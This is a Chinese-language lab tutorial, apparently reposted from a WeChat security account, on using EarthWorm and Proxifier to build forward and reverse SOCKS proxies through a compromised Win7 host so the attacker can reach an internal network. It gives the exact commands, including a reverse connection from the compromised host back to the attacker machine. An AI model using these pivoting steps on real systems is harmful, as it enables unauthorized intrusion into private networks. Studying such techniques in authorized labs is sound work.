大概思路
拿下一个shell后,想要访问这个shell主机的其他内网机器的服务,用earthworm作为一个流量转发,把ew对应的系统文件上传到这台有shell的主机进行正向或者反向的代理配置。使得攻击机可以通过这台有shell的主机在本地就可以访问目标内网其他机器
Earthworm是什么
网穿透神器 EarthWorm,(简称 EW) 是一套轻量便携且功能强大的网络穿透工具,基于标准 C 开发,具有 socks5 代理、端口转发和端口映射三大功能。
支持各种不同的系统环境
正向代理和反向代理用途的区别
正向代理的典型用途是为在防火墙内的局域网客户端提供访问Internet的途径。
反向代理的典型用途是将防火墙后面的服务器提供给Internet用户访问。
环境配置
简单配置好一个内网环境
https://blog.csdn.net/weixin_41598660/article/details/106365740
Win10为攻击机, 靶机为win7(192.168.10.162,10.0.0.11),win3(10.0.0.2)
Win10 ping不通win3内网
Win7和win3是同一个内网,能相互ping通,且win7能访问win3的内网web页面
正向代理模拟实战
Win10拿下了win7的webshell,并上传 earthworm的window执行文件
虚拟一下终端!
执行命令!
Ew_for_Win.exe -s ssocksd -l 8002
然后打开Proxifier工具,进行端口和SOCKS的配置
[05.30 23:43:38] WINWORD.EXE *64 - self.events.data.microsoft.com:443
打开通过代理 192.168.10.162:8002 SOCKS5
Chrome浏览器右击选择Proxifier代理打开页面。
然后在浏览器输入win3内网web的地址,发现,win10能访问了!
反向代理
因为已经拿下了win7的shell,也已经上传了earthworth的window文件。所以进行一下反向代理
Win10中 ew_for_Win.exe -s rcsocks -l 1080 -e 8888
PS D:ewew-master> .ew_for_Win.exe -s rcsocks -l 1080 -e 8888
把代理1080端口(也可以是其他端口)转移到8888端口
蚁剑中操作如下,让win7的发送一个反向代理的端口,对接到win10(192.168.10.1)
Ew_for_Win.exe -s rssocks -d 192.168.10.1 -e 8888
然后win10这边会有反应说ok
然后再对Proxifier进行本地接收端口的配置
尝试访问内网03的web页面!成功
对内网10.0.0.2机器进行一个远程的连接!成功
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(巢安实验室):EarthWorm结合proxifier搭建正反向代理服务器
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论